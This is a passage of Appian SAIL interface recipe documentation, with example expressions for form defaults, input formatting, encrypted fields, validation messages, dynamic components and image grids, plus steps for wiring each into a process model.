{% highlight sail %}
=load(
local!username,
local!email,
local!emailModified: false,
a!formLayout(
label: "SAIL Example: Default Value Based on User Input",
firstColumnContents: {
a!textField(
label: "Username",
instructions: "Value saved: " & local!username,
value: local!username,
saveInto: {
local!username,
if(local!emailModified, {}, a!save(local!email, append(save!value, "@example.com")))
},
refreshAfter: "KEYPRESS"
),
a!textField(
label: "Email",
instructions: "Value saved: " & local!email,
value: local!email,
saveInto: {
local!email,
a!save(local!emailModified, true)
}
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Type into the *Username* field and notice that the *Email* field is pre-populated.
1. Type into the *Username* field, then modify the *Email* value, and type into the *Username* field again. The *Email* field is no longer pre-populated.
Notice that the value of username as well as the email address field are updated as you type. That's because the username input is configured with `refreshAfter: "KEYPRESS"`
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: username (Text), email (Text)
1. Delete local variables: `local!username`, `local!email`
1. In your expression, replace:
- `local!username` with `ri!username`
- `local!email` with `ri!email`
1. In your process model, create variables: username (Text) with no value, email (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(username: ac!username, email: ac!email)`
- On a start form: `=rule!sailRecipe(username: pv!username, email: pv!email)`
---
layout: basic
title: Set the Default Value of CDT Fields Based on a User Input
category: sailrecipe
---
### Goal ###
Set the value of a CDT field based on a user input.
*Note:* This design pattern is not recommended for offline interfaces because the conditional setting of a value based on user input requires a connection to the server.
### Expression ###
{% highlight sail %}
=load(
local!myCdt: type!LabelValue(),
a!formLayout(
label: "SAIL Example: Default Value Based on User Input",
instructions: "local!myCdt: " & local!myCdt,
firstColumnContents: {
a!textField(
label: "Label",
instructions: "Value saved: " & local!myCdt.label,
value: local!myCdt.label,
saveInto: {
local!myCdt.label,
a!save(local!myCdt.value, append(save!value, "@example.com"))
},
refreshAfter: "KEYPRESS"
),
a!textField(
label: "Value",
instructions: "Value saved: " & local!myCdt.value,
value: local!myCdt.value,
saveInto: local!myCdt.value,
refreshAfter: "KEYPRESS"
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Type into the first text field, and notice that the second text field is pre-populated. The instructions of the form show the value of the CDT variable.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: myCdt (Any Type)
1. Remove the `load()` function
1. Delete local variable: `local!myCdt`
1. In your expression, replace:
- `local!myCdt` with `ri!myCdt`
1. In your process model, create variables: myCdt (LabelValue) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(myCdt: ac!myCdt)`
- On a start form: `=rule!sailRecipe(myCdt: pv!myCdt)`
---
layout: basic
title: Format the User's Input
category: sailrecipe
---
### Goal ###
Format the user's input as a telephone number in the US and save the formatted value, not the user's input.
*Note:* This design pattern is not recommended for offline interfaces because the conditional formatting of a user input requires a connection to the server.
This expression uses the `text()` function to format the telephone number. You may choose to format using your own rule, so you would create the supporting rule first, and then create an interface with the main expression.
### Expression ###
{% highlight sail %}
=load(
local!telephone,
a!formLayout(
label: "SAIL Example: Format US Telephone Number",
firstColumnContents: {
a!textField(
label: "Telephone",
instructions: "Value saved: " & local!telephone,
value: local!telephone,
saveInto: a!save(local!telephone, text(save!value, "###-###-####;###-###-####"))
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Enter `1234567890` then click somewhere else on the form. Notice that the phone number is now formatted.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: telephone (Text)
1. Remove the `load()` function
1. Delete local variables: `local!telephone`
1. In your expression, replace:
- `local!telephone` with `ri!telephone`
1. In your process model, create variables: telephone (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(telephone: ac!telephone)`
- On a start form: `=rule!sailRecipe(telephone: ac!telephone)`
---
layout: basic
title: Gather Sensitive Data from a User and Encrypt It</a>
category: sailrecipe
---
### Goal ###
Create a form that gathers sensitive information from a user and store it securely in an Encrypted Text variable.
### Expression ###
{% highlight sail %}
load(
local!firstName,
local!lastName,
local!ssn,
local!ailment,
a!formLayout(
label: "New Patient Visit",
firstColumnContents: {
a!textField(
label: "First Name",
value: local!firstName,
saveInto: local!firstName,
required: true
),
a!textField(
label: "Last Name",
value: local!lastName,
saveInto: local!lastName,
required: true
),
a!encryptedTextField(
label: "Social Security Number",
instructions: "xxx-xx-xxxx",
value: local!ssn,
saveInto: local!ssn,
required: true
),
a!encryptedTextField(
label: "Primary Ailment",
value: local!ailment,
saveInto: local!ailment
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Enter values for the fields on the start form, and click Submit to see that there are no errors.
1. The values entered in the EncryptedTextField components are encrypted before being stored. To see the encrypted values, test this form in process.
### Note ###
1. Values generated from an encryptedTextField component will cause an error if you try to display them in a textField component, but can be displayed in clear text using an encryptedTextField component, as in this example.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: firstName (Text), lastName (Text), ssn (Encrypted Text), and ailment (Encrypted Text)
1. Delete local variables: `local!firstName`, `local!lastName`, `local!ssn`, and `local!ailment`
1. In your expression, replace:
- `local!firstName` with `ri!firstName`
- `local!lastName` with `ri!lastName`
- `local!ssn` with `ri!ssn`
- `local!ailment` with `ri!ailment`
1. In your process model, create variables: firstName (Text), lastName (Text), ssn (Encrypted Text), and ailment (Encrypted Text), all with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(firstName: ac!firstName, lastName: ac!lastName, ssn: ac!ssn, ailment: ac!ailment)`
- On a start form: `=rule!sailRecipe(firstName: pv!firstName, lastName: pv!lastName, ssn: pv!ssn, ailment: pv!ailment)`
1. If you interrogate your process variables after starting a process, entering values, and submitting the form, you will see that the variable contains an encrypted value.
---
layout: basic
title: Add Custom Validation Rules
category: sailrecipe
---
### Goal ###
Enforce that the user enters no more than a certain number of characters in their text field, e.g. to match the size constraint on a database column.

### Expression ###
{% highlight sail %}
=load(
local!a,
local!b,
a!formLayout(
label: "SAIL Example: Custom Validation Rules",
firstColumnContents:{
a!textField(
label: "5 Characters",
instructions: "Character count: " & len(local!a) & "/5",
value: local!a,
saveInto: local!a,
refreshAfter: "KEYPRESS",
validations: if(len(local!a)<=5, null, "Enter no more than 5 characters")
),
a!textField(
label: "Text",
value: local!b,
saveInto: local!b,
validations: "Any text you enter is invalid"
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Type more than 5 characters in the first text field to see the validation message. The form cannot be submitted while the validation message is displayed.
- Notice that the second text component doesn't show the validation message until the user types into it. This is because the text value isn't considered invalid until it has a value. See also: [Validating User Inputs](SAIL_Design.md#Validating_User_Inputs)
- When testing offline, the form queues for submission but returns the validation messages when you go back online and the form attempts to submit.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: a (Text), b (Text)
1. Remove the `load()` function
1. Delete local variables: `local!a`, `local!b`
1. In your expression, replace:
- `local!a` with `ri!a`
- `local!b` with `ri!b`
1. In your process model, create variables: aaa (Text) with no value, bbb (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(a: ac!aaa, b: ac!bbb)`
- On a start form: `=rule!sailRecipe(a: pv!aaa, b: pv!bbb)`
---
layout: basic
title: Add Multiple Validation Rules to One Component
category: sailrecipe
---
### Goal ###
Enforce that the user enters at least a certain number of characters in their text field, and also enforce that it contains the "@" character.
### Expression ###
{% highlight sail %}
=load(
local!a,
a!formLayout(
label: "SAIL Example: Multiple Validation Rules on One Component",
firstColumnContents:{
a!textField(
label: "Text",
instructions: "Enter at least 5 characters, and include the @ character",
value: local!a,
saveInto: local!a,
validations: {
if(len(local!a)>5, null, "Enter at least 5 characters"),
if(isnull(local!a), null, if(find("@", local!a)<>0, null, "You need an @ character!"))
}
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Type fewer than 5 characters and click "Submit".
- When testing offline, the form queues for submission but returns the validation messages when you go back online and the form attempts to submit.
1. Type more than 5 characters but no "@" and click "Submit".
- When testing offline, the form queues for submission but returns the validation messages when you go back online and the form attempts to submit.
1. Type more than 5 characters and include "@" and click "Submit".
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: a (Text)
1. Remove the `load()` function
1. Delete local variable: `local!a`
1. In your expression, replace:
- `local!a` with `ri!a`
1. In your process model, create variable: aaa (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(a: ac!aaa)`
- On a start form: `=rule!sailRecipe(a: pv!aaa)`
---
layout: basic
title: Define a Simple Currency Component
category: sailrecipe
---
### Goal ###
Show a text field that allows the user to enter dollar amounts including the dollar symbol and thousand separators, but save the value as a decimal rather than text. Additionally, always show the dollar amount with the dollar symbol.
*Note:* This design pattern is not recommended for offline interfaces because immediate feedback for and formatting of a user input requires a connection to the server.
### Expression ###
{% highlight sail %}
=load(
local!amount,
a!formLayout(
label: "SAIL Example: Simple Currency Component",
firstColumnContents:{
a!textField(
label:"Amount in Text",
instructions: "Type of local!amount: " & typename(typeof(local!amount)),
value: if(isnull(local!amount), "", dollar(local!amount)),
saveInto: a!save(local!amount, todecimal(save!value))
),
if(
isnull(local!amount),
{},
a!textField(
label: "Divided by 10",
value: local!amount/10,
readOnly: true
)
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Enter `$12345` and click away from the field. Notice that the text box shows $12,345.00 and that the saved value is a decimal.
1. Enter `$12,345.23` and click away from the field.
1. Enter `a1b2c3` and click away. Notice that the text box removes the non-numeric characters and treats the remaining as a decimal value. A true currency component would catch this as an error case, hence why this is called a simple currency example.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: amount (Number Decimal)
1. Remove the `load()` function
1. Delete local variables: `local!amount`
1. In your expression, replace:
- `local!amount` with `ri!amount`
1. In your process model, create variables: amount (Number Decimal) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(amount: ac!amount)`
- On a start form: `=rule!sailRecipe(amount: pv!amount)`
*Note:* If you want to save this example as a reusable component, see also: [Creating Reusable Custom Components](SAIL_Design.md#Creating_Reusable_Custom_Components).
---
layout: basic
title: Add Multiple Text Components Dynamically
category: sailrecipe
---
### Goal ###
Show a dynamic number of text components to simulate a multi-text input box. A new text box is shown as soon as the user starts typing into the last input box.
The main expression uses two supporting rules, so let's create them first.
- `ucDynamicFieldsUpdateArray`: Updates the guest array at the specified index, and appends a null item at the end of the array. If the last item in the array is already null, no new item is added.
- `ucDynamicFieldEach`: Returns a text field populated with the guest value at the given index.
Create expression rule `ucDynamicFieldsUpdateArray` with the following rule inputs:
- index (Number Integer)
- guests (Text Array)
- newValue (Text)
Enter the following definition for the rule:
{% highlight sail %}
=with(
local!newGuestList: updatearray(ri!guests, ri!index, ri!newValue),
if(
isnull(local!newGuestList[count(local!newGuestList)]),
local!newGuestList,
append(local!newGuestList, "")
)
)
{% endhighlight %}
Create expression rule `ucDynamicFieldEach` with the following rule inputs:
- index (Number Integer)
- guests (Text Array)
Enter the following definition for the rule:
{% highlight sail %}
=a!textField(
label: if(ri!index=1, "Guest Names", ""),
value: ri!guests[ri!index],
saveInto: a!save(ri!guests, rule!ucDynamicFieldsUpdateArray(ri!index, ri!guests, save!value)),
refreshAfter: "KEYPRESS"
)
{% endhighlight %}
Now that we've created the two supporting rules, let's move on to the main expression.
### Expression ###
{% highlight sail %}
=load(
local!guests: {""},
a!formLayout(
label: "SAIL Example: Add Text Components Dynamically",
firstColumnContents: {
/* The guests array is passed to the rule directly, creating a partial function */
a!applyComponents(
function: rule!ucDynamicFieldEach(index: _, guests: local!guests),
array: 1+enumerate(count(local!guests))
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Type into the text field and notice that an empty one is appended.
**Offline**
Since components cannot be added dynamically when offline, you should include multiple text fields initially in case they are needed. To support this use case for offline, we will create a different expression with a different supporting rule.
Create expression rule `ucTextFieldEach` with the following rule inputs:
- index (Number Integer)
- guests (Text Array)
Enter the following definition for the rule:
{% highlight sail %}
=a!textField(
label: if(ri!index=1, "Guest Names", ""),
labelPosition: if(ri!index=1, "ABOVE", "COLLAPSED"),
value: ri!guests[ri!index],
saveInto: ri!guests[ri!index]
)
{% endhighlight %}
Now create your main interface with the following definition:
{% highlight sail %}
=load(
local!guests: repeat(5, ""),
/* Replace 5 with the maximum number of text fields that you expect will be needed */
a!formLayout(
label: "SAIL Example: Add Text Components Dynamically",
firstColumnContents: {
/* The guests array is passed to the rule directly, creating a partial function */
a!applyComponents(
function: rule!ucTextFieldEach(guests: local!guests, index: _),
array: 1+enumerate(count(local!guests))
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
saveInto: a!save(local!guests, reject(fn!isnull, local!guests))
/* This will remove any null values from the array upon submission */
)
)
)
)
{% endhighlight %}
### Test it out ###
1. There are now 5 text fields available to the user immediately.
1. Enter values in some of the text fields but leave others blank and submit the form. Notice that null values are removed from the array and only non-null values are saved.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: guests (Text Array)
1. Remove the `load()` function
1. Delete local variable: `local!guests`
1. In your expression, replace:
- `local!guests` with `ri!guests`
1. In your process model, create variables: guests (Text Array) with value `""`
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(guests: ac!guests)`
- On a start form: `=rule!sailRecipe(guests: pv!guests)`
---
layout: basic
title: Add Multiple File Upload Components Dynamically
category: sailrecipe
---
**Goal**: Show a dynamic number of file upload components. After a file is uploaded, add a new file upload component for another file to be uploaded should it be necessary. If an uploaded file is removed, remove its component so the set of components always has exactly one empty spot.
The main expression uses two supporting rules, so let's create them first.
- `ucMultiFileUploadResizeArray`: Updates an array with a value at an index, growing the array if the index is past the end and shrinking the array if the value is null.
- `ucMultiFileUploadRenderField`: Returns a file upload component populated with the value at the given index.
Create expression rule `ucMultiFileUploadResizeArray` with the following rule inputs:
- array (Document Array)
- index (Integer)
- value (Document)
Enter the following definition for the rule:
{% highlight sail %}
=if(
/* Do we need to add? `*/
and(
/*` Yes, if the value isn't null `*/
not(isnull(ri!value)),
/*` and we're at the end of the list `*/
ri!index = 1 + length(ri!array)
),
append(
ri!array,
/*` Append the new value to the end of the list `*/
ri!value
),
if(
/*` Do we need to remove? `*/
/*` Only if value is now null (value was removed) `*/
isnull(ri!value),
/*` Remove: remove the list item for this field `*/
remove(ri!array, ri!index),
/*` Neither add nor remove, so insert at index */
insert(
ri!array,
ri!value,
ri!index
)
)
)
{% endhighlight %}
Create expression rule `ucMultiFileUploadRenderField` with the following rule inputs:
- label (Text)
- files (Document Array)
- target (Document or Folder)
- index (Integer)
Enter the following definition for the rule:
{% highlight sail %}
=with(
local!paddedArray: append(ri!files, null),
a!fileUploadField(
label: if(ri!index = 1, ri!label, ""),
target: ri!target,
value: local!paddedArray[ri!index],
saveInto: {
a!save(ri!files, ucMultiFileUploadResizeArray(ri!files, ri!index, save!value))
}
)
)
{% endhighlight %}
Now that we've created the two supporting rules, let's move on to the main expression.
**Expression**:
{% highlight sail %}
=load(
local!files: {},
/* Update the target to a real folder to actually persist the files! */
local!target: tofolder(-1),
a!formLayout(
label: "SAIL Example: Multiple File Upload",
firstColumnContents: {
a!applyComponents(
function: rule!ucMultiFileUploadRenderField(label: "Upload Files", files: local!files, target: local!target, index: _),
array: 1 + fn!enumerate(1 + length(local!files))
),
a!textField(
label: "local!files value",
value: local!files,
readOnly: true
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
**Test it out**:
1. Upload a file and notice that an empty one is appended.
1. Upload several more files, then try removing one from the beginning or middle of the list. Notice the empty component is removed.
**Offline**
Since components cannot be added dynamically when offline, you should include multiple file upload fields initially in case they are needed. To support this use case for offline, we will create a different expression with a different supporting rule.
Create expression rule `ucFileUploadEach` with the following rule inputs:
- files (Document Array)
- target (Document or Folder)
- index (Number Integer)
Enter the following definition for the rule:
{% highlight sail %}
=a!fileUploadField(
label: if(ri!index=1, "Upload Files", ""),
labelPosition: if(ri!index=1, "ABOVE", "COLLAPSED"),
target: ri!target,
value: ri!files[ri!index],
saveInto: ri!files[ri!index]
)
{% endhighlight %}
Now create your main interface with the following definition:
{% highlight sail %}
=load(
local!files: repeat(5,null),
/* Replace 5 with the maximum number of files that you expect will need to be uploaded */
/* Update the target to a real folder to actually persist the files! */
local!target: tofolder(-1),
a!formLayout(
label: "SAIL Example: Multiple File Upload (Offline)",
firstColumnContents: {
a!applyComponents(
function: rule!ucFileUploadEach(files: local!files, target: local!target, index: _),
array: 1+enumerate(count(local!files))
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
saveInto: a!save(local!files, reject(fn!isnull, local!files))
/* This will remove any null values from the array upon submission */
)
)
)
)
{% endhighlight %}
### Test it out ###
1. There are now 5 file upload fields available to the user immediately.
1. Upload files to some of the fields but leave others blank and submit the form. Notice that null values are removed from the array and only non-null values are saved.
**To write your data to process**:
1. Save your interface as sailRecipe
1. Create or choose a destination folder for the uploaded files
1. Create interface input: files (Document Array), target (Document or Folder)
1. Remove the `load()` function
1. Delete local variable: `local!files`, `local!target`
1. In your expression, replace:
- `local!files` with `ri!files`
- `tofolder(-1)` with `ri!target`
1. In your process model, create variables: files (Document Array) with no value, target (Document or Folder) with the value of a system folder.
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(files: ac!files, target: ac!target)`
- On a start form: `=rule!sailRecipe(files: pv!files, target: pv!target)`
### Notable implementation details ###
- The process variable `pv!target` can be used in one of two ways. You can set it to a constant of type Document or Folder that points to a system folder, if you want to hardcode the folder in your process. If you're also creating the folder in process, you can pass that folder into `pv!target` as well.
---
layout: basic
title: Add and Populate Sections Dynamically
category: sailrecipe
---
### Goal ###
Add and populate a dynamic number of sections, one for each item in a CDT array. Each section contains an input for each field of the CDT. A new entry is added to the CDT array as the user is editing the last section to allow the user to quickly add new entries without extra clicks. Sections can be independently removed by clicking on a "Remove" button. In the example below, attempting to remove the last section simply blanks out the inputs. Your own use case may involve removing the last section altogether.
The main expression uses a few supporting rules, so let's create them first.
- `ucDynamicSectionAddOne`: Takes an array of records, and adds a null record of the same type if the given index is for the last item in the array.
- `ucDynamicSectionRemoveFromArray`: Removes the item at the given index from the records array. If removing the last item in the array, replaces the last item with a null record of the same type.
- `ucDynamicSectionEach`: Returns a section with its components populated with the value of the record at the specified index.
Create expression rule `ucDynamicSectionAddOne` with the following rule inputs:
- array (Any Type)
- index (Number Integer)
Enter the following definition for the rule:
{% highlight sail %}
=if(
ri!index <> count(ri!array),
ri!array,
append(ri!array, cast(typeof(ri!array), null))
)
{% endhighlight %}
Create expression rule `ucDynamicSectionRemoveFromArray` with the following rule inputs:
- index (Number Integer)
- array (Any Type)
Enter the following definition for the rule:
{% highlight sail %}
=if(
count(ri!array)=1,
{cast(typeof(ri!array), null)},
remove(ri!array, ri!index)
)
{% endhighlight %}
Create interface `ucDynamicSectionEach` with the following interface inputs:
- index (Number Integer)
- records (Any Type)
- recordTokens (Any Type)
Enter the following definition for the interface:
{% highlight sail %}
=a!sectionLayout(
label: "Section " & ri!index,
firstColumnContents:{
a!textField(
label: "Label",
value: ri!records[ri!index].label,
saveInto: {
ri!records[ri!index].label,
a!save(ri!records, rule!ucDynamicSectionAddOne(ri!records, ri!index)),
a!save(ri!recordTokens, rule!ucDynamicSectionAddOne(ri!recordTokens, ri!index))
},
refreshAfter: "KEYPRESS"
),
a!textField(
label: "Value",
value: ri!records[ri!index].value,
saveInto: ri!records[ri!index].value,
refreshAfter: "KEYPRESS"
),
if(
count(ri!records) > 1,
a!buttonArrayLayout(
a!buttonWidget(
label: "Remove",
value: ri!index,
saveInto: {
a!save(ri!records, rule!ucDynamicSectionRemoveFromArray(save!value, ri!records)),
a!save(ri!recordTokens, rule!ucDynamicSectionRemoveFromArray(save!value, ri!recordTokens))
}
)
),
{}
)
}
)
{% endhighlight %}
Now that we've created the supporting rules, let's move on to the main expression.
### Expression ###
{% highlight sail %}
=load(
local!records: {type!LabelValue()},
local!recordTokens,
a!formLayout(
label: "SAIL Example: Add Sections Dynamically",
instructions: "local!records: " & local!records,
firstColumnContents: {
a!applyComponents(
function: rule!ucDynamicSectionEach(index: _, records: local!records, recordTokens: local!recordTokens),
array: 1+enumerate(count(local!records)),
arrayVariable: local!recordTokens
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Fill in the first field and notice that a new section is added as you're typing.
1. Add a few sections and click on the Remove button to remove items from the array.
**Offline**
Since sections cannot be added dynamically when offline, you should include multiple sections initially in case they are needed. To support this use case for offline, we will create a different expression with a different supporting rule.
Create expression rule `ucSectionEach` with the following rule inputs:
- index (Number Integer)
- records (Any Type)
Enter the following definition for the rule:
{% highlight sail %}
=a!sectionLayout(
label: "Section " & ri!index,
firstColumnContents: {
a!textField(
label: "Label",
value: ri!records[ri!index].label,
saveInto: ri!records[ri!index].label
),
a!textField(
label: "Value",
value: ri!records[ri!index].value,
saveInto: ri!records[ri!index].value
)
}
)
{% endhighlight %}
Now create your main interface with the following definition:
{% highlight sail %}
=load(
local!records: repeat(3, type!LabelValue()),
/* Replace 3 with the maximum number of sections that you expect will be needed */
a!formLayout(
label: "SAIL Example: Multiple Sections (Offline)",
firstColumnContents: {
a!applyComponents(
function: rule!ucSectionEach(index: _, records: local!records),
array: 1+enumerate(count(local!records))
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
saveInto: a!save(local!records, reject(fn!isnull, local!records))
/* This will remove any null values from the array upon submission */
)
)
)
)
{% endhighlight %}
### Test it out ###
1. There are now 5 sections available to the user immediately.
1. Fill out some of the sections but leave others blank and submit the form. Notice that null values are removed from the array and only non-null values are saved.
### Notable implementation details ###
- `local!recordTokens` must be declared as a `load()` local variable as shown above for adding and removing of sections to work correctly. The local variable is then passed to the looping function `a!applyComponents` as its third parameter. a!applyComponents will create an array in this variable that is the same length as the record array. Changes to the record array such as adding, removing, or swapping must also be made to the recordTokens array.
- When dynamically adding and generating SAIL components in this way, always use the `a!xxxComponents()` looping functions. See also: [New Looping Functions for Components](System_Functions.md#a!applyComponents.28.29)
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: records (Any Type)
1. Delete local variable: `local!records`
1. In your expression, replace:
- `local!records` with `ri!records`
1. In your process model, create variables: records (LabelValue array) as an array with a single null value, such as `{type!LabelValue()}`
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(records: ac!records)`
- On a start form: `=rule!sailRecipe(records: pv!records)`
---
layout: basic
title: Display an Array of Images Stored in Document Management
category: sailrecipe
---
### Goal ###
Display a set of images stored in Appian's document management system.
*Note:* This design pattern is not recommended for offline interfaces because images do not render when offline.
First, upload a few images into Appian. Then, create a constant of type Document and supporting rule.
- `UC_IMAGE_DOCS`: An array of images in Document Management.
- `ucDocumentImageEach`: Returns a DocumentImage for use by the image field component. The document name is used as the caption.
Create constant `UC_IMAGE_DOCS` of type Document and select Multiple. Select the images that you uploaded as the value.
Create expression rule `ucDocumentImageEach` with the following rule input:
- document (Document)
Enter the following definition for the rule:
{% highlight sail %}
=a!documentImage(
document: ri!document,
caption: document(ri!document, "name")
)
{% endhighlight %}
Now that we've created the supporting constant and rule, let's move on to the main expression.
### Expression ###
{% highlight sail %}
=a!imageField(
label: "Images",
size: "THUMBNAIL",
images: apply(rule!ucDocumentImageEach, cons!UC_IMAGE_DOCS)
)
{% endhighlight %}
### Test it out ###
1. Click on an image and navigate the array using the mouse or cursor keys.
---
layout: basic
title: Display Images in a Grid
category: sailrecipe
---
### Goal ###
Display a set of images in a read-only paging grid. The images are stored in Appian's document management system.
*Note:* This design pattern is not recommended for offline interfaces because images do not render when offline.
First, upload a few images into Appian. Then, create a constant of type document named `UC_IMAGE_DOCS` and select the Multiple checkbox. Select the images that you uploaded as the value.
Now that we've created the supporting constant, let's move on to the main expression.
{% highlight sail %}
=a!gridField(
label: "SAIL Example: Grid with Images",
totalCount: count(cons!UC_IMAGE_DOCS),
columns: {
a!gridTextColumn(
label: "Document Name",
data: apply(fn!document, cons!UC_IMAGE_DOCS, "name")
),
a!gridImageColumn(
label: "Image Thumbnail Column",
data: apply(a!documentImage(document: _), cons!UC_IMAGE_DOCS),
size: "THUMBNAIL"
)
},
value: a!pagingInfo(
startIndex: 1,
batchSize: count(cons!UC_IMAGE_DOCS)
)
)
{% endhighlight %}
### Notable implementation details ###
* Because we did not configure any paging or sorting, clicking on the column headers will not sort the columns.
* See also: [Filter the Data in a Grid](#Filter_the_Data_in_a_Grid)
* If your images are appropriate to show at a 20 x 20px size you can use `size: "ICON"` instead of `size: "THUMBNAIL"`.
---
layout: basic
title: Add a Custom Required Message
category: sailrecipe
---
### Goal ###
Instead of the product message that shows up when a required field has no value, show a custom message.
### Expression ###
{% highlight sail %}
=load(
local!a,
local!b,
a!formLayout(
label: "SAIL Example: Custom Required Message",
firstColumnContents:{
a!textField(
label: "Custom Message",
value: local!a,
saveInto: local!a,
required: true,
requiredMessage: "You must enter a value!"
),
a!textField(
label: "Product Message",
value: local!b,
saveInto: local!b,
required: true
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Leave both text fields blank and click "Submit".
- The custom required message appears regardless of whether you are online or offline.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: a (Text), b (Text)
1. Remove the `load()` function
1. Delete local variables: `local!a`, `local!b`
1. In your expression, replace:
- `local!a` with `ri!a`
- `local!b` with `ri!b`
1. In your process model, create variables: aaa (Text) with no value, bbb (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(a: ac!aaa, b: ac!bbb)`
- On a start form: `=rule!sailRecipe(a: pv!aaa, b: pv!bbb)`
---
layout: basic
title: Showing Validation Errors that Aren't Specific to One Component
category: sailrecipe
---
### Goal ###
Alert the user about form problems that aren't specific to one component, showing the message only when the user clicks "Submit". In this case, there are two fields and although neither are required, at least one of them must be filled out to submit the form.

### Expression ###
{% highlight sail %}
=load(
local!phone,
local!email,
a!formLayout(
label: "SAIL Example: Showing Form Errors on Submission",
firstColumnContents:{
a!textField(
label: "Phone Number",
value: local!phone,
saveInto: local!phone
),
a!textField(
label: "Email Address",
value: local!email,
saveInto: local!email
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
),
validations: {
if(
and(isnull(local!phone), isnull(local!email)),
a!validationMessage(
message: "You must enter either a phone number or an email address!",
validateAfter: "SUBMIT"
),
{}
)
}
)
)
{% endhighlight %}
### Test it out ###
1. Leave both text fields blank and click "Submit".
- When testing offline, the form queues for submission but returns the validation message when you go back online and the form attempts to submit.
### Notable implementation details ###
- The system function a!validationMessage() allows us to specify whether the validation message is shown right away (`REFRESH`) or when the user submits the form (`SUBMIT`). If the validation message should always be shown right away, we could just pass the message to `a!formLayout()`'s `validations` parameter as Text. To show multiple messages, we can pass a list of Text, a list of `a!validationMessage()`, or a mix of the two.
- You can also configure `a!sectionLayout()` to show validation messages:

### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: phone (Text), email (Text)
1. Remove the `load()` function
1. Delete local variables: `local!phone`, `local!email`
1. In your expression, replace:
- `local!phone` with `ri!phone`
- `local!email` with `ri!email`
1. In your process model, create variables: phone (Text) with no value, email (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(phone: ac!phone, email: ac!email)`
- On a start form: `=rule!sailRecipe(phone: pv!phone, email: pv!email)`
---
layout: basic
title: Approve/Reject Buttons with Conditional Requiredness
category: sailrecipe
---
### Goal ###
Present two buttons to the end user called "Approve" and "Reject" and only make the comments field required if the user clicks "Reject".
*Note:*
- This design pattern is not recommended for offline interfaces because the conditional requiredness of a field based on user interaction requires a connection to the server.
- `validationGroup` can have any string that you define. See also: [Using Validation Groups](SAIL_Design.md#Adding_Validation_to_Button_Components_using_Validation_Groups)
### Expression ###
{% highlight sail %}
=load(
local!comments,
local!hasApproved,
a!formLayout(
label: "SAIL Example: Approve Reject Buttons with Conditional Requiredness",
firstColumnContents: {
a!paragraphField(
label: "Comments",
instructions: "This also shows an example of a custom required message",
value: local!comments,
saveInto: local!comments,
required: true,
